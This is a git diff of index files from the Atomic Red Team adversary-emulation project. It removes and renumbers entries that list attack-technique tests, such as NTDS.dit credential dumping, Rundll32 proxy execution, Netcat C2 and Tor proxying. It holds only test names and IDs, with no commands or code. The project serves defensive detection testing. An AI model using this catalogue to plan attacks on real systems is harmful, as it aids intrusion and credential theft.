revert_id

Merge branch 'AutoSUID_linux' of github.com:redcanaryco/atomic-red-team into AutoSUID_linux
remove uuid
2022-02-07 16:23:02 -08:00 · 2022-02-07 12:28:24 -08:00 · 2022-02-07 12:28:09 -08:00 · 2022-02-07 12:23:51 -08:00 · 2022-02-07 12:23:34 -08:00 · 2022-02-07 12:15:12 -08:00
46 changed files with 171 additions and 1516 deletions
@@ -70,9 +70,8 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
-credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
@@ -537,7 +536,6 @@ defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
-defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -547,8 +545,6 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
-defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
-defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
@@ -564,7 +560,6 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
 defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
-defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
@@ -847,7 +842,6 @@ discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory D
 discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
-discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -955,8 +949,6 @@ execution,T1053.006,Systemd Timers,2,Create a user level transient systemd servi
 execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
-execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
-execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -1020,8 +1012,6 @@ command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsof
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
-command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
-command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
 command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
@@ -264,8 +264,6 @@ execution,T1053.006,Systemd Timers,2,Create a user level transient systemd servi
 execution,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
-execution,T1059.004,Unix Shell,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
-execution,T1059.004,Unix Shell,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -50,9 +50,8 @@ credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c623714
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
 credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt
 credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy remotely with WMI,d893459f-71f0-484d-9808-ec83b2b64226,command_prompt
-credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy remotely (WMI) with esentutl,21c7bf80-3e8b-40fa-8f9d-f5b194ff2865,command_prompt
-credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
-credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
+credential-access,T1003.003,NTDS,6,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell
+credential-access,T1003.003,NTDS,7,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
@@ -363,7 +362,6 @@ defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe r
 defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
-defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -373,8 +371,6 @@ defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6
 defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
 defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
 defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
-defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
-defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
 defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
@@ -385,7 +381,6 @@ defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downlo
 defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
-defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -565,7 +560,6 @@ discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa
 discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
-discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -613,8 +607,6 @@ command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
-command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
-command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
 command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
@@ -103,9 +103,8 @@
  - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
  - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
-  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux [linux]
@@ -850,8 +849,7 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
-  - Atomic Test #1: Register Portable Virtualbox [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
  - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
  - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -862,8 +860,6 @@
  - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
  - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
-  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
-  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -886,7 +882,6 @@
  - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
  - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
  - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
-  - Atomic Test #9: DiskShadow Command Execution [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
  - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
  - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -1364,7 +1359,6 @@
  - Atomic Test #12: Remote System Discovery - ip neighbour [linux]
  - Atomic Test #13: Remote System Discovery - ip route [linux]
  - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
-  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1604,8 +1598,6 @@
 - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
  - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
  - Atomic Test #2: Command-Line Interface [macos, linux]
-  - Atomic Test #3: Harvest SUID executable files [linux]
-  - Atomic Test #4: LinEnum tool execution [linux]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
  - Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
@@ -1723,9 +1715,7 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
-  - Atomic Test #1: Psiphon [windows]
-  - Atomic Test #2: Tor Proxy Usage - Windows [windows]
+- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
  - Atomic Test #1: ICMP C2 [windows]
@@ -737,8 +737,6 @@
 - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
  - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
  - Atomic Test #2: Command-Line Interface [macos, linux]
-  - Atomic Test #3: Harvest SUID executable files [linux]
-  - Atomic Test #4: LinEnum tool execution [linux]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.005 Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

@@ -78,9 +78,8 @@
  - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
  - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
-  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
@@ -602,8 +601,7 @@
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
  - Atomic Test #1: DCShadow (Active Directory) [windows]
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
-  - Atomic Test #1: Register Portable Virtualbox [windows]
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
  - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
  - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -614,8 +612,6 @@
  - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
  - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
-  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
-  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -632,7 +628,6 @@
  - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
  - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
  - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
-  - Atomic Test #9: DiskShadow Command Execution [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
  - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
  - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -963,7 +958,6 @@
  - Atomic Test #9: Remote System Discovery - adidnsdump [windows]
  - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
  - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
-  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1049,9 +1043,7 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
-  - Atomic Test #1: Psiphon [windows]
-  - Atomic Test #2: Tor Proxy Usage - Windows [windows]
+- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
  - Atomic Test #1: ICMP C2 [windows]
@@ -24,7 +24,7 @@
 |  | [Native API](../../T1106/T1106.md) | [Cloud Accounts](../../T1078.004/T1078.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [PowerShell](../../T1059.001/T1059.001.md) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
